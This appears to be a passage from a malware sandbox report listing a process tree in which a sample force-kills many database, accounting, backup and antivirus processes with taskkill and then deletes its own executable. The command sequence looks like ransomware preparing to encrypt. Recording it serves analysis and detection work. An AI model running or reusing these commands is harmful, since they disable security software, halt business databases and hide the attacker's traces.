cmd /C taskkill /F /T /IM CoreSync*
2⤵
PID:1848

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM CoreSync*
3⤵
- Kills process with taskkill
PID:1044

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM Adobe CEF Helper*
2⤵
PID:1828

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM Adobe CEF Helper*
3⤵
- Kills process with taskkill
PID:1904

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM node*
2⤵
PID:1372

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM node*
3⤵
- Kills process with taskkill
PID:1808

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM AdobeIPCBroker*
2⤵
PID:1356

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM AdobeIPCBroker*
3⤵
- Kills process with taskkill
PID:772

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM sync-taskbar*
2⤵
PID:1576

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM sync-taskbar*
3⤵
- Kills process with taskkill
PID:1952

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM sync-worker*
2⤵
PID:1964

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM sync-worker*
3⤵
- Kills process with taskkill
PID:2000

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM InputPersonalization*
2⤵
PID:2036

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM InputPersonalization*
3⤵
- Kills process with taskkill
PID:2040

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM AdobeCollabSync*
2⤵
PID:1516

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM AdobeCollabSync*
3⤵
PID:1000

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM BrCtrlCntr*
2⤵
PID:784

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM BrCtrlCntr*
3⤵
- Kills process with taskkill
PID:1060

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM BrCcUxSys*
2⤵
PID:1424

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM BrCcUxSys*
3⤵
- Kills process with taskkill
PID:1232

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM SimplyConnectionManager*
2⤵
PID:1876

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM SimplyConnectionManager*
3⤵
PID:1888

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
2⤵
PID:1044

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM Simply.SystemTrayIcon*
3⤵
- Kills process with taskkill
PID:760

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM fbguard*
2⤵
PID:660

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM fbguard*
3⤵
- Kills process with taskkill
PID:1364

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM fbserver*
2⤵
PID:1372

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM fbserver*
3⤵
- Kills process with taskkill
PID:876

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM ONENOTEM*
2⤵
PID:1360

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM ONENOTEM*
3⤵
PID:1632

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM wrapper*
2⤵
PID:1576

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM wrapper*
3⤵
- Kills process with taskkill
PID:2020

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM DefWatch*
2⤵
PID:1964

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM DefWatch*
3⤵
- Kills process with taskkill
PID:1980

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM ccEvtMgr*
2⤵
PID:832

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM ccEvtMgr*
3⤵
PID:1568

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM ccSetMgr*
2⤵
PID:1460

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM ccSetMgr*
3⤵
- Kills process with taskkill
PID:1500

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM SavRoam*
2⤵
PID:784

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM SavRoam*
3⤵
- Kills process with taskkill
PID:1892

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM Sqlservr*
2⤵
PID:1424

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM Sqlservr*
3⤵
- Kills process with taskkill
PID:1872

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM sqlagent*
2⤵
PID:1876

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM sqlagent*
3⤵
- Kills process with taskkill
PID:1824

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM sqladhlp*
2⤵
PID:1856

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM sqladhlp*
3⤵
- Kills process with taskkill
PID:580

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM Culserver*
2⤵
PID:660

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM Culserver*
3⤵
- Kills process with taskkill
PID:340

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM RTVscan*
2⤵
PID:1368

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM RTVscan*
3⤵
PID:1580

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM sqlbrowser*
2⤵
PID:1360

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM sqlbrowser*
3⤵
- Kills process with taskkill
PID:1956

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM SQLADHLP*
2⤵
PID:1988

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM SQLADHLP*
3⤵
PID:2024

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM QBIDPService*
2⤵
PID:1964

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM QBIDPService*
3⤵
- Kills process with taskkill
PID:1432

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
2⤵
PID:1512

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM Intuit.QuickBooks.FCS*
3⤵
- Kills process with taskkill
PID:788

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM QBCFMonitorService*
2⤵
PID:1460

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM QBCFMonitorService*
3⤵
- Kills process with taskkill
PID:1052

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM sqlwriter*
2⤵
PID:1540

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM sqlwriter*
3⤵
- Kills process with taskkill
PID:1832

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM msmdsrv*
2⤵
PID:1424

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM msmdsrv*
3⤵
- Kills process with taskkill
PID:1868

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM tomcat6*
2⤵
PID:1820

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM tomcat6*
3⤵
PID:1352

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM zhudongfangyu*
2⤵
PID:1908

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM zhudongfangyu*
3⤵
- Kills process with taskkill
PID:1524

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM vmware-usbarbitator64*
2⤵
PID:660

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM vmware-usbarbitator64*
3⤵
- Kills process with taskkill
PID:1552

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM vmware-converter*
2⤵
PID:1368

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM vmware-converter*
3⤵
- Kills process with taskkill
PID:1984

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM dbsrv12*
2⤵
PID:1960

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM dbsrv12*
3⤵
- Kills process with taskkill
PID:2016

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM dbeng8*
2⤵
PID:1988

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM dbeng8*
3⤵
- Kills process with taskkill
PID:1344

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
2⤵
PID:1964

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##WID*
3⤵
PID:1560

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
2⤵
PID:1476

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MSSQL$VEEAMSQL2012*
3⤵
- Kills process with taskkill
PID:1056

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
2⤵
PID:624

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
3⤵
- Kills process with taskkill
PID:572

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM SQLBrowser*
2⤵
PID:1540

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM SQLBrowser*
3⤵
- Kills process with taskkill
PID:1904

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM SQLWriter*
2⤵
PID:1816

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM SQLWriter*
3⤵
- Kills process with taskkill
PID:520

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM FishbowlMySQL*
2⤵
PID:1808

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM FishbowlMySQL*
3⤵
- Kills process with taskkill
PID:772

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
2⤵
PID:568

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##WID*
3⤵
PID:1652

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MySQL57*
2⤵
PID:1952

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MySQL57*
3⤵
- Kills process with taskkill
PID:1944

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
2⤵
PID:2000

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
3⤵
- Kills process with taskkill
PID:2012

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
2⤵
PID:1960

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MSSQLServerADHelper100*
3⤵
- Kills process with taskkill
PID:1492

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
2⤵
PID:1988

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
3⤵
- Kills process with taskkill
PID:1604

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM msftesql-Exchange*
2⤵
PID:1964

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM msftesql-Exchange*
3⤵
- Kills process with taskkill
PID:744

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
2⤵
PID:1628

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
3⤵
- Kills process with taskkill
PID:1036

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*
2⤵
PID:624

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MSSQL$SBSMONITORING*
3⤵
PID:1852

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*
2⤵
PID:1880

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MSSQL$SHAREPOINT*
3⤵
- Kills process with taskkill
PID:1820

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
2⤵
PID:1816

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
3⤵
- Kills process with taskkill
PID:876

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
2⤵
PID:620

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
3⤵
- Kills process with taskkill
PID:660

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
2⤵
PID:1632

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM SQLAgent$SBSMONITORING*
3⤵
- Kills process with taskkill
PID:1940

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*
2⤵
PID:1168

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM SQLAgent$SHAREPOINT*
3⤵
- Kills process with taskkill
PID:1320

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM QBFCService*
2⤵
PID:2000

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM QBFCService*
3⤵
- Kills process with taskkill
PID:1400

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM QBVSS*
2⤵
PID:1480

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM QBVSS*
3⤵
- Kills process with taskkill
PID:1060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\f4009abe9f41da41e48340c96e29d62c.exe" /F
2⤵
- Deletes itself
PID:1388